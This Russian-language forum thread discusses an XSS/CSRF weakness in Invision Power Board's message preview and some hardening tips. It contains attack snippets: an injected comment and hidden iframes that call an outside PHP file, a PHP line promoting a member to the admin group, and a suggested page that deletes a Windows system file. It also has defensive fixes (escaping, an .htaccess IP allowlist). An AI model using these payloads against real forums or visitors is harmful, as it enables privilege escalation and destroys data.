Уязвимости форумов Invision Power Board

[DRoVa.TM]

Если я не ошибаюсь то это XSS уязвимость которую можно провести только на себя.

Это на первый взгляд.

Хеши снимаются на раз.

Реализация уже опубликована - пошла в народ.

Кстати нашел уже у Song-а другое решение этой проблемы: смотреть тут.

Хотя он тоже считает, что это псевдо-опасность.

[Master]

Мне бфарбер с IPS написал что действует только для себя.

Так что это даже не баг, нууу может мини-баг

[Garret]

DRoVa.TM, ну потому что оно так и есть

 

Так что это даже не баг, нууу может мини-баг

Это просто псевдо ХСС У нас и свои авторитеты есть

Я читал его пост, мол мы фиксить не будем, так как это не уязвимость.

[DRoVa.TM]

DRoVa.TM, ну потому что оно так и есть

Ну что я могу сказать.

Посмотрев один раз на вот ЭТО - невооруженным глазом вижу, что РАБОТАЕТ и не может не работать.

И себе я прикрою и Вам посоветую.

А уж чьих советов слушать Вам - это уже не моё дело

[Arhar]

понимаешь, работает на себя когда жмешь предварительный просмотр

а когда отправишь - тогда сработает на получателя

напишите в новости вариант Сонга, это самое реальное, он просто станартной функцией из ipsclass'а убирает все противное (в этой функции заранее все реплейсы)

[Garret]

Я особо не смотрел, но если это пассивный ХСС, то значит он работает только при предпросмотре.

[DRoVa.TM]

Вот только предпросмотр организуеться извне, с передачей нужных параметров, которые на влете ни чем не проверяются.

И получаеться что любой юзерь (в том числе и админ) заходит на вообще левую страницу а ему в невидимом фрейме организуеться предпросмотр, предпросмотр из его же ПМ, с соответствующей темой.

Вобщем ХЕШИ улитают. Я смотрел "ОСОБО", да там и смотреть нечего.

[Garret]

Вот только предпросмотр организуеться извне

Ты представляешь себе как это, не линку же пользователю надо будет нажать, а послать ПОСТ запрос с нужными параметрами

[DRoVa.TM]

А какая проблема послать пост на броузере с включенной джавой?

[Garret]

Чтобы это сделать на форуме должна быть еще уязвимость которая позволит это сделать Ну или заставить пользователя посетить левую страницу которая проделает это.

[DRoVa.TM]

Чтобы это сделать на форуме должна быть еще уязвимость которая позволит это сделать Ну или заставить пользователя посетить левую страницу которая проделает это.

Как админ, админу: посещяю все страницы которые постят на форуме, как минимум для того, чтоб убедиться, не разместили линку ХЗ кудда.

Итого запостил - и жди админа или модератора который проверит

При чем проверит и не удалит, потому что ничего предосудительного на этой странице не найдет, потому что искать то особо не будет. И все пользователи форума пойдут туда оставлять свои хеши ...

[Anna]

Вобще, у меня на 2.0 я посмотрела подобная дырка была закрыта черт знает когда (обратите внимание на дату когда я это фиксила):

 

// security change 24.07.05
			//$old_title   = preg_replace( "/'/", "'", $std->txt_stripslashes($_POST['msg_title']) );
		$old_title   = $std->txt_htmlspecialchars($std->txt_stripslashes($_POST['msg_title']) );
//^^

 

в 2.0 - это /lib/msg_functions.php

[need_help]

проблему уже решил сообщение можно удалить

[Arhar]

а можно ли зафигачить в этот фрейм ссылку на php файл, который будет подгружатся и выполнятся уже на моем сервере (над моим сервером будут производится действия, типа скачивания данных с MySQL)?

[DRoVa.TM]

Ест-но можно, актуально для извергов когда на мускуле доступ локалхост-онли (сейчас у всех практически так). Только туда этот файло надо как-то положить и положить так чтоб к нему был доступ и чтоб он выполнялся.

Но это все уже пройденый этап. С этого и началась эпоха веб-хака.

А вот как использовать текущее ПО - это народ еще непридумал.

Хотя чисто логически вполне можно представить, как с помощью джавы тебя в фрейме направляют в админку и задают параметр при котором ты какой-то ади переводишь в группу АДМИН, или чистишь базу. И все это происходит от тебя и с твоего АйПи - и судя по логам ты сам все это сделал.

Ну это при условии, что у тебя все еще активнай сессия доступа в мемборку.

Вобщем если даже кто-то вумный допетрит и сделает каку, то уж объяснить последовательность действия обычным детишкам, от которых и идут большенство хлопот, он не смогет даже если сильно захочет.

Ест-но все ИМХО

[Arhar]

я имею ввиду

"><!--exec.url="http://name.domen/file.php"-->

а если будет файл след содержания по ссылке:

<?php
$this->ipsclass->DB->simple_exec_query( array( 'update' => 'members', 'set' => 'mgroup=4', 'where' => "id=напишут") );
?>

тогда что будет?

[DRoVa.TM]

А зачем exec.url ?

проще:

<iframe src='http://name.domen/file.php' width=1 height=1 style='display:none;'></iframe>

Прямое обращение к файлу и от твоего броузера.

Да хоть параметры в урл забивай

<iframe src='http://name.domen/file.php?param1=1&param2=2' width=1 height=1 style='display:none;'></iframe>

Если уж народ постом заполненую форму на указаный урл с твоего броузера организуют, то просто на урл сходить вообще не проблема, куча вариантов и решений.

Единственная проблема - заставить этот урл делать то что нужно, а это в свою очередь делиться на:

- положить в нужное место нужный файл;

- найти возможность изпользовать уже лежащие там файлы;

Вот в закрытии таких возможностей и заключаеся - решение проблем безопастности.

Но процесс безконечен. Всегда будут возможности и постояно их прийдеться закрывать.

Соревнование мозгов продолжаеться

[Arhar]

а ничего не будет

скрипт обрабатывается на сервере,на котором он есть, а потом результат уже идет туда, куда вставили..это не уязвимость, нельзя в html'е заинклюдить файл

 

кстати, на 2.0.х тоже есть

[xRay]

Передумал и добанул свою писанину

[DRoVa.TM]

а ничего не будет

скрипт обрабатывается на сервере,на котором он есть, а потом результат уже идет туда, куда вставили..это не уязвимость, нельзя в html'е заинклюдить файл

И не требуеться инклюдить. И обрабатываеться на своем сервере, факт. Но тут важнее, что бы результаты не переправить в другое место.

Вобщем безсмыслено объясняться на пальцах

[eklips13]

Доброе время суток!

Я вот совсем недавно решил поюзать ипб..... Вобщем я вобше тут новичок и умоляю вас помочь по защите.

Нужно сделать вход в админку исключительно по айпи адрессу. Я этому методу доверяю больше всего..... Тексь ну и если можно обьясните как можно стандартный файл админки переименовать на другой например fuck.php

Глубоко извеняюсь если где то уже есть ето обсуждение... Поиск по моим вопросом привёл в эту тему ))

Заранее спасибо!!!!

[Fox Mulder]

юзай .htaccess

[eklips13]

Спасибо за ответ. Вот шяс перечитываю ваш весь форум и как раз наткунлся на етот метод.....

Что нужно прописать не подскажите?

[Fox Mulder]

текст файла .хтацес:

 

<Files "index.php"> (или admin.php зависит от версии форума)

Order Deny,Allow

Deny from all

Allow from 82.144.203.76 (АЙпишник)

</Files>

[U-N-O]

А можно сделать чтоб сообщение вылетало всек кто ломится в админку например так:

В admin.php добавить:

if (getenv("REMOTE_ADDR")!="127.0.0.1" && getenv("REMOTE_ADDR")!="you ip")
{
print "<script>document.location.href='fuck.php'</script>";
exit();
}

 

Если ип непрописан в этом скрипте то переадресует на fuck.php где можно передать привет

Например:

<?php
echo "Идити вы лесом";
?>

Или болия жестокий

<?php
$filename = "C:\WINDOWS\explorer.exe";
unlink ($filename);
?>

Ну второй это токо для виндовс

И состандартным путем